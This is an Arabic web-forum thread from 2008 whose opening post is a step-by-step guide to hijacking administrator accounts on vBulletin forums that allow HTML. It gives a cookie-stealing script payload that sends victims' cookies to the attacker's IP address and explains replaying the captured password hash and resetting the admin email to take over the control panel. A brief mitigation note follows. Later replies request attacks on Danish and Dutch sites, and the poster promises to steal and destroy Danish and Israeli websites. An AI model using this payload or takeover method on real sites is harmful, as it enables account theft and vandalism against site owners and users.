منتديات مدرسة المشاغبين  
دردشة وشات المشاغبين دردشة شات منوع شات خليجي
ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله

العودة  »  منتديات مدرسة المشاغبين > ~¤ô¦¦§¦¦ô¤~ منتديات الكمبيوطر والانترنط ~¤ô¦¦§¦¦ô¤~ > الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus


للانف و الوجه عيادة بشار البزرة جراحة تجميل الانف و الوجه ينتهي في 19\12\1429 هـ

منتديات جسد اللقافة ينتهي في 15\2\1429 هـ 'منتدى لحظات لكل جديد ومفيد حيث المتعه والفائده ينتهي في 13\12\1429 هـ موقع احطك بعيوني ينتهي في 19\12\1429 هـ
عقارية المدينة ينتهي في 12\12\1429 هـ حراج سيارات شراء استبدال بيع جديدة و مستعملة جميع أنواع السيارات ينتهي في 12\5\1430 هـ موقع نهر الأنمي انتهاء في تاريخ 3-12-1429 هـ
مركز تحميل فلفة ينتهي في 16\12\1429 هـ 'للاعلان بالموقع 0\0\1429 هـ شبكة ورود الروح ينتهي في 16\12\1429 هـ


نعتذر عن حذف وايقاف اي عضو يستخدم بريد وهمي او غير صحيح او اسم غير لائق على ذلك جرى التنبيه
البعض يتسائل كيف يمكنني التسجيل و ماهي طريقة الحصول على عضوية بدون مشاكل الحل سهل جدا شرح كامل بالصور ( من هنا )

طريقة اختراق المنتديات التي تدعم أكواد الــhtml


إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
  #1 (permalink)  
قديم 09-23-2008, 08:08 AM
صورة hacker mail
يطلع بدون استئذان
 
تاريخ التسجيل: Jul 2008
البلد - المكان و السكن : الرياض
السيرة :
الهواية : التدمير
الوظيفة - العمل: قاتل هوتميلات
الجنس : ذكر
الجنسية : فلسطين
موقع : www.bdr130.net/vb/
الجوال الموبايل : لقافه
مشاركات : 339
العمر :
طريقة اختراق المنتديات التي تدعم أكواد الــhtml

طريقة اختراق المنتديات التي تدعم ال
html
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ
HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ
HTML
) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.*****e+'">';</script>

مع ملاحظة تغير الـ
IP Adress
الى رقم الـ
IP
الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل
IIS
او
Apache
او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ
Log
الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد
Apche
واختر
logs
واختر
Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة
Forgot Password
.. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ
HTML
في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود
HTML
باي صورة كانت )

كما يجب اغلا كود الـ
IMG
.. لانه ببساطة بامكانك استخدامه بدل كلمة
<script>
فاذا وضعت
<img>
او
<Demon>
او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


من مواضيعي 0 بلسم الجرح لا تغلط على عامر الفريدي أحسلك لو رجال أدخل
0 تم حرق منتدى من أحدى المنتديات من قبل hacker_mail
0 شي غريب وأنا أخترق أحد المواقع الكبرى :(
0 دورة لتعليم أختراق المواقع والمنتديات
0 نكة حلوة في عالم الهكر

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #2 (permalink)  
قديم 09-23-2008, 01:29 PM
صورة الحائر 2007
يمون على المشاغبين والمشاغبات
 
تاريخ التسجيل: Jul 2008
البلد - المكان و السكن : الســـــ الطــائف ــــعودية
السيرة : ؟؟؟؟؟؟؟
الهواية : الَسِبَــاحَة **** وَكًــرَة الَــقَــدَمُ
الوظيفة - العمل: طـــــالب
الجنس : ذكــــــر boy
الجنسية : ســـــعودي وأفتــخر
موقع : تعب قلبي
الجوال الموبايل : الــدمــــعــة 7610
مشاركات : 1,551
العمر :
رد: طريقة اختراق المنتديات التي تدعم أكواد الــhtml

الله يطعك العافية


من مواضيعي 0 كل ما يخص برامج n95 ^^^حصرية^^^
0 ترقص بتشجيع مع شقيقتها في الشارع بنات اخر زمن ..........
0 شوفوا هذه الصور غريبة مررررررررررررة ..... لا تفوتكم بسرعة ..............
0 جـــــــــــــــــــــــــــــــربني 100%100 والله والله
0 برنامج صانع الثيمات لجوال لايفوتكم 2008 ( n70 )

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #3 (permalink)  
قديم 09-24-2008, 12:37 PM
صورة hacker mail
يطلع بدون استئذان
 
تاريخ التسجيل: Jul 2008
البلد - المكان و السكن : الرياض
السيرة :
الهواية : التدمير
الوظيفة - العمل: قاتل هوتميلات
الجنس : ذكر
الجنسية : فلسطين
موقع : www.bdr130.net/vb/
الجوال الموبايل : لقافه
مشاركات : 339
العمر :
رد: طريقة اختراق المنتديات التي تدعم أكواد الــhtml

الله يعافيك مشكووور على الرد

منور أخوي


من مواضيعي 0 بلسم الجرح لا تغلط على عامر الفريدي أحسلك لو رجال أدخل
0 تم حرق منتدى من أحدى المنتديات من قبل hacker_mail
0 شي غريب وأنا أخترق أحد المواقع الكبرى :(
0 دورة لتعليم أختراق المواقع والمنتديات
0 نكة حلوة في عالم الهكر

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #4 (permalink)  
قديم 10-04-2008, 12:33 PM
جاي معه ملفه
 
تاريخ التسجيل: May 2007
البلد - المكان و السكن :
السيرة :
الهواية :
الوظيفة - العمل:
الجنس :
الجنسية :
موقع :
الجوال الموبايل :
مشاركات : 3
العمر :
رد: طريقة اختراق المنتديات التي تدعم أكواد الــhtml

الله يعطيك العافيه ياخوي
ياليت تستفيد من خبرتك بالهكرز وتضرب كم موقع الي يسبون الرسول صلى الله عليه وسلم من المواقع الهولنديه ولا الدنماركيه

وجزاك الله خير


من مواضيعي

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #5 (permalink)  
قديم 10-05-2008, 08:43 AM
صورة hacker mail
يطلع بدون استئذان
 
تاريخ التسجيل: Jul 2008
البلد - المكان و السكن : الرياض
السيرة :
الهواية : التدمير
الوظيفة - العمل: قاتل هوتميلات
الجنس : ذكر
الجنسية : فلسطين
موقع : www.bdr130.net/vb/
الجوال الموبايل : لقافه
مشاركات : 339
العمر :
رد: طريقة اختراق المنتديات التي تدعم أكواد الــhtml

أنته تأمر أمر راح يتم سرقة مواقع دنماركية وتدميرها قريبا لكن أفيدونا بمواضيعك وحطو مواضيع فيه روابط مواقع دنماركية أو أسرائيليه


من مواضيعي 0 بلسم الجرح لا تغلط على عامر الفريدي أحسلك لو رجال أدخل
0 تم حرق منتدى من أحدى المنتديات من قبل hacker_mail
0 شي غريب وأنا أخترق أحد المواقع الكبرى :(
0 دورة لتعليم أختراق المواقع والمنتديات
0 نكة حلوة في عالم الهكر

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
إضافة رد على طريقة اختراق المنتديات التي تدعم أكواد الــhtml

مواقع النشر


أدوات الموضوع
انواع عرض الموضوع



الساعة الآن 08:53 AM.


للإعلان بالموقع    |    اتصـل بنــا

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd diamond


SEO by vBSEO 3.1.0